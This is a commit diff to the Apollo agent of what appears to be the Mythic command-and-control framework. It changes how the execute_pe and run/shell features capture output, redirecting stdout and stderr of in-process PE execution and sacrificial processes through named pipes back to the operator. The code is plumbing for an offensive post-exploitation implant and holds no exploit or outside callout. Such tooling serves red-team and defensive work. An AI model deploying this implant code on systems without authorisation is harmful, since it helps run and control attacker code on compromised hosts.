fixes for execute_pe/run/shell

MythicAgents · Nov 8, 2024 · 6646cea · 6646cea
1 parent 05896c9
commit 6646cea
Show file tree

Hide file tree

Showing 7 changed files with 386 additions and 107 deletions.
diff --git a/Payload_Type/apollo/CHANGELOG.MD b/Payload_Type/apollo/CHANGELOG.MD
@@ -4,6 +4,14 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [v2.2.19] - 2024-11-08
+
+### Changed
+
+- Updated execute_pe code to use named pipes for reading output
+- Updated sacrificial process code to read stdout as well for commands like run
+- Updated run/shell to read output and exit
+
 ## [v2.2.18] - 2024-10-16
 
 ### Changed

diff --git a/Payload_Type/apollo/apollo/agent_code/ExecutePE/Helpers/StdHandleRedirector.cs b/Payload_Type/apollo/apollo/agent_code/ExecutePE/Helpers/StdHandleRedirector.cs
@@ -0,0 +1,142 @@
+#define NAMED_PIPE
+using System;
+using System.IO.Pipes;
+using System.IO;
+using static ExecutePE.Internals.NativeDeclarations;
+using System.Threading.Tasks;
+using System.Threading;
+using ApolloInterop.Classes.Events;
+
+namespace ExecutePE.Helpers
+{
+
+    class StdHandleRedirector : IDisposable
+    {
+        NamedPipeServerStream stdoutServerStream;
+        NamedPipeClientStream stdoutClientStream;
+
+        FileStream stdoutReader;
+
+        private IntPtr _oldStdout;
+        private IntPtr _oldStderr;
+
+        private event EventHandler<StringDataEventArgs> _stdoutHandler;
+
+        private CancellationTokenSource _cts = new CancellationTokenSource();
+        private Task _stdoutReadTask;
+
+        public StdHandleRedirector(EventHandler<StringDataEventArgs> stdoutHandler)
+        {
+            _stdoutHandler += stdoutHandler;
+
+            Initialize();
+
+            _stdoutReadTask = new Task(() =>
+            {
+                ReadStdoutAsync();
+            });
+
+
+            _stdoutReadTask.Start();
+        }
+
+
+        private void Initialize()
+        {
+
+            string stdoutGuid = Guid.NewGuid().ToString();
+
+            stdoutServerStream = new NamedPipeServerStream(stdoutGuid, PipeDirection.InOut, 100, PipeTransmissionMode.Byte, PipeOptions.Asynchronous);
+            stdoutServerStream.BeginWaitForConnection(new AsyncCallback(stdoutServerStream.EndWaitForConnection), stdoutServerStream);
+
+            stdoutClientStream = new NamedPipeClientStream("127.0.0.1", stdoutGuid, PipeDirection.InOut, PipeOptions.Asynchronous);
+            stdoutClientStream.Connect();
+
+            stdoutReader = new FileStream(stdoutServerStream.SafePipeHandle.DangerousGetHandle(), FileAccess.Read);
+
+            _oldStdout = GetStdHandle(StdHandles.Stdout);
+            _oldStderr = GetStdHandle(StdHandles.Stderr);
+
+            SetStdHandle(StdHandles.Stdout, stdoutClientStream.SafePipeHandle.DangerousGetHandle());
+            SetStdHandle(StdHandles.Stderr, stdoutClientStream.SafePipeHandle.DangerousGetHandle());
+        }
+
+        private void ReadFileStreamAsync(FileStream stream, EventHandler<StringDataEventArgs> eventhandler)
+        {
+            int szBuf = 4096;
+            byte[] tmp;
+            int n;
+            byte[] newstr;
+
+            do
+            {
+                tmp = new byte[szBuf];
+                n = 0;
+                Task<string> t = new Task<string>(() =>
+                {
+                    n = stream.Read(tmp, 0, szBuf);
+                    if (n > 0)
+                    {
+                        newstr = new byte[n];
+                        Array.Copy(tmp, newstr, n);
+                        return Console.OutputEncoding.GetString(newstr);
+                    }
+                    return null;
+                });
+                t.Start();
+                try
+                {
+                    t.Wait(_cts.Token);
+                }
+                catch (OperationCanceledException)
+                {
+                    break;
+                }
+                if (t.Status == TaskStatus.RanToCompletion)
+                {
+                    eventhandler?.Invoke(this, new StringDataEventArgs(t.Result));
+                }
+            } while (!_cts.IsCancellationRequested);
+
+            do
+            {
+                tmp = new byte[szBuf];
+                n = stream.Read(tmp, 0, szBuf);
+                if (n > 0)
+                {
+                    newstr = new byte[n];
+                    Array.Copy(tmp, newstr, n);
+                    eventhandler?.Invoke(this, new StringDataEventArgs(Console.OutputEncoding.GetString(newstr)));
+                }
+                else
+                {
+                    break;
+                }
+            } while (n > 0);
+        }
+
+        private void ReadStdoutAsync()
+        {
+            ReadFileStreamAsync(stdoutReader, _stdoutHandler);
+        }
+
+        public void Dispose()
+        {
+            SetStdHandle(StdHandles.Stderr, _oldStderr);
+            SetStdHandle(StdHandles.Stdout, _oldStdout);
+
+            stdoutClientStream.Flush();
+
+            stdoutClientStream.Close();
+
+            _cts.Cancel();
+
+            Task.WaitAll(new Task[]
+            {
+                _stdoutReadTask
+            });
+
+            stdoutServerStream.Close();
+        }
+    }
+}
diff --git a/Payload_Type/apollo/apollo/agent_code/ExecutePE/Program.cs b/Payload_Type/apollo/apollo/agent_code/ExecutePE/Program.cs
@@ -12,18 +12,27 @@
 using ApolloInterop.Classes.Events;
 using ApolloInterop.Enums.ApolloEnums;
 using ApolloInterop.Constants;
+using ST = System.Threading.Tasks;
+using System.IO.Pipes;
+using ApolloInterop.Classes.IO;
+using System.IO;
+using ExecutePE.Helpers;
 
 namespace ExecutePE
 {
     internal static class Program
     {
         private static JsonSerializer _jsonSerializer = new JsonSerializer();
         private static string? _namedPipeName;
+        private static ConcurrentQueue<byte[]> _senderQueue = new ConcurrentQueue<byte[]>();
         private static ConcurrentQueue<IMythicMessage> _recieverQueue = new ConcurrentQueue<IMythicMessage>();
         private static AsyncNamedPipeServer? _server;
+        private static AutoResetEvent _senderEvent = new AutoResetEvent(false);
         private static AutoResetEvent _receiverEvent = new AutoResetEvent(false);
         private static ConcurrentDictionary<string, ChunkedMessageStore<IPCChunkedData>> MessageStore = new ConcurrentDictionary<string, ChunkedMessageStore<IPCChunkedData>>();
-
+        private static CancellationTokenSource _cts = new CancellationTokenSource();
+        private static Action<object>? _sendAction;
+        private static ST.Task? _clientConnectedTask;
 
         private static int Main(string[] args)
         {
@@ -32,10 +41,35 @@ private static int Main(string[] args)
                 throw new Exception("No named pipe name given.");
             }
             _namedPipeName = args[0];
+            _sendAction = (object p) =>
+            {
+                PipeStream pipe = (PipeStream)p;
+
+                while (pipe.IsConnected && !_cts.IsCancellationRequested)
+                {
+                    WaitHandle.WaitAny(new WaitHandle[] {
+                        _senderEvent,
+                        _cts.Token.WaitHandle
+                    });
+                    while (_senderQueue.TryDequeue(out byte[] result))
+                    {
+                        pipe.BeginWrite(result, 0, result.Length, OnAsyncMessageSent, pipe);
+                    }
+                }
+
+                while (_senderQueue.TryDequeue(out byte[] message))
+                {
+                    pipe.BeginWrite(message, 0, message.Length, OnAsyncMessageSent, pipe);
+                }
 
+                // Wait for all messages to be read by Apollo
+                pipe.WaitForPipeDrain();
+                pipe.Close();
+            };
             _server = new AsyncNamedPipeServer(_namedPipeName, instances: 1, BUF_OUT: IPC.SEND_SIZE, BUF_IN: IPC.RECV_SIZE);
+            _server.ConnectionEstablished += OnAsyncConnect;
             _server.MessageReceived += OnAsyncMessageReceived;
-
+            var return_code = 0;
             try
             {
                 if (IntPtr.Size != 8)
@@ -44,7 +78,7 @@ private static int Main(string[] args)
                 }
 
                 _receiverEvent.WaitOne();
-                _server.Stop();
+                //_server.Stop();
 
                 IMythicMessage taskMsg;
 
@@ -59,16 +93,43 @@ private static int Main(string[] args)
                 }
 
                 ExecutePEIPCMessage peMessage = (ExecutePEIPCMessage)taskMsg;
-                PERunner.RunPE(peMessage);
-                return 0;
+
+                using (StdHandleRedirector redir = new StdHandleRedirector(OnBufferWrite))
+                {
+                    PERunner.RunPE(peMessage);
+                }
+
             }
             catch (Exception exc)
             {
-                Console.WriteLine(exc.ToString());
-                return exc.HResult;
+                // Handle any exceptions and try to send the contents back to Mythic
+                _senderQueue.Enqueue(Encoding.UTF8.GetBytes(exc.ToString()));
+                _senderEvent.Set();
+                return_code = exc.HResult;
             }
-        }
+            _cts.Cancel();
 
+            // Wait for the pipe client comms to finish
+            while (_clientConnectedTask is ST.Task task && !_clientConnectedTask.IsCompleted)
+            {
+                task.Wait(1000);
+            }
+            return return_code;
+        }
+        private static void OnBufferWrite(object sender, StringDataEventArgs args)
+        {
+            if (args.Data != null)
+            {
+                _senderQueue.Enqueue(Encoding.UTF8.GetBytes(args.Data));
+                _senderEvent.Set();
+            }
+        }
+        private static void OnAsyncMessageSent(IAsyncResult result)
+        {
+            PipeStream pipe = (PipeStream)result.AsyncState;
+            pipe.EndWrite(result);
+            pipe.Flush();
+        }
         private static void OnAsyncMessageReceived(object sender, NamedPipeMessageArgs args)
         {
             IPCChunkedData chunkedData = _jsonSerializer.Deserialize<IPCChunkedData>(
@@ -99,5 +160,17 @@ private static void DeserializeToReceiverQueue(object sender, ChunkMessageEventA
             _recieverQueue.Enqueue(msg);
             _receiverEvent.Set();
         }
+
+        public static void OnAsyncConnect(object sender, NamedPipeMessageArgs args)
+        {
+            // We only accept one connection at a time, sorry.
+            if (_clientConnectedTask != null)
+            {
+                args.Pipe.Close();
+                return;
+            }
+            _clientConnectedTask = new ST.Task(_sendAction, args.Pipe);
+            _clientConnectedTask.Start();
+        }
     }
 }
diff --git a/Payload_Type/apollo/apollo/agent_code/Process/SacrificialProcess.cs b/Payload_Type/apollo/apollo/agent_code/Process/SacrificialProcess.cs
@@ -569,9 +569,9 @@ private void PostStartupInitialize()
         {
             Handle = _processInfo.hProcess;
             PID = (uint)_processInfo.dwProcessId;
-            //_standardOutput = new StreamReader(new FileStream(hReadOut, FileAccess.Read), Console.OutputEncoding);
-            //_standardError = new StreamReader(new FileStream(hReadErr, FileAccess.Read), Console.OutputEncoding);
-            //_standardInput = new StreamWriter(new FileStream(hWriteIn, FileAccess.Write), Console.InputEncoding);
+            _standardOutput = new StreamReader(new FileStream(hReadOut, FileAccess.Read), Console.OutputEncoding);
+            _standardError = new StreamReader(new FileStream(hReadErr, FileAccess.Read), Console.OutputEncoding);
+            _standardInput = new StreamWriter(new FileStream(hWriteIn, FileAccess.Write), Console.InputEncoding);
         }
 
         private async void WaitForExitAsync()
@@ -580,22 +580,24 @@ private async void WaitForExitAsync()
             {
                 await Task.Factory.StartNew(() =>
                 {
-                    //var stdOutTask = GetStdOutAsync();
-                    //var stdErrTask = GetStdErrAsync();
-                    //var waitExitForever = new Task(() =>
-                    //{
-                    //    _pWaitForSingleObject(Handle, 0xFFFFFFFF);
-                    //});
-                    //stdOutTask.Start();
-                    //stdErrTask.Start();
-                    //waitExitForever.Start();
+                    var stdOutTask = GetStdOutAsync();
+                    var stdErrTask = GetStdErrAsync();
+                    var waitExitForever = new Task(() =>
+                    {
+                        _pWaitForSingleObject(Handle, 0xFFFFFFFF);
+                    });
+                    stdOutTask.Start();
+                    stdErrTask.Start();
+                    waitExitForever.Start();
+
                     try
                     {
-                        //waitExitForever.Wait(_cts.Token);
-                        WaitHandle.WaitAny(new WaitHandle[]
-                        {
-                            _cts.Token.WaitHandle,
-                        });
+                        waitExitForever.Wait(_cts.Token);
+                        // at this point, the process has exited
+                        //WaitHandle.WaitAny(new WaitHandle[]
+                        //{
+                        //    _cts.Token.WaitHandle,
+                        //});
                     }
                     catch (OperationCanceledException)
                     {
@@ -642,6 +644,10 @@ private IEnumerable<string> ReadStream(TextReader stream)
                     if (readTask.IsCompleted)
                     {
                         bytesRead = readTask.Result;
+                    } else
+                    {
+                        bytesRead = 0;
+
                     }
                     //bytesRead = stream.Read(buf, 0, szBuffer);